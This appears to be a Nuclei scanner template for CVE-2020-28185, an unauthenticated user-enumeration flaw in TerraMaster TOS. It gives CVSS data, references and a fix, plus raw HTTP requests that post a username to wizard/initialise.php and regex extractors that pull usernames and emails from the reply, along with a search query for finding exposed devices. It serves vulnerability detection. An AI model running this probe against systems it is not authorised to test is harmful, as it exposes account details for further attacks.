id: CVE-2020-28185 info: name: TerraMaster TOS < 4.2.06 - User Enumeration author: pussycat0x severity: medium description: | User Enumeration vulnerability in TerraMaster TOS <= 4.2.06 allows remote unauthenticated attackers to identify valid users within the system via the username parameter to wizard/initialise.php. impact: | An attacker can enumerate valid usernames, potentially aiding in further attacks. remediation: | Upgrade TerraMaster TOS to version 4.2.06 or later. reference: - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/TerraMaster%20TOS%20%E7%94%A8%E6%88%B7%E6%9E%9A%E4%B8%BE%E6%BC%8F%E6%B4%9E%20CVE-2020-28185.md - https://nvd.nist.gov/vuln/detail/CVE-2020-28185 - https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/ - https://www.terra-master.com/ - https://github.com/ArrestX/--POC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2020-28185 epss-score: 0.00465 epss-percentile: 0.74945 cpe: cpe:2.3:o:terra-master:tos:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: terra-master product: tos fofa-query: '"TerraMaster" && header="TOS"' tags: cve2020,cve,terramaster,enum,tos,terra-master http: - raw: - | GET /tos/index.php?user/login HTTP/1.1 Host: {{Hostname}} - | POST /wizard/initialise.php HTTP/1.1 Host: {{Hostname}} Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: {{RootURL}}/tos/index.php?user/login tab=checkuser&username=admin matchers-condition: and matchers: - type: word part: body words: - '"username":' - '"email":' - '"status":' condition: and - type: status status: - 200 extractors: - type: regex part: body_2 regex: - '"username":"(.*?)"' - '"email":"(.*?)"' # digest: 4a0a00473045022100a5b737159ab2fba2d8bd3672a035aba09dfb55a458424c927483f2b426434f7902207074df75bb5334a71d812327db078c71acb16a5fa90456df382201c6c618938b:922c64590222798bb761d5b6d8e72950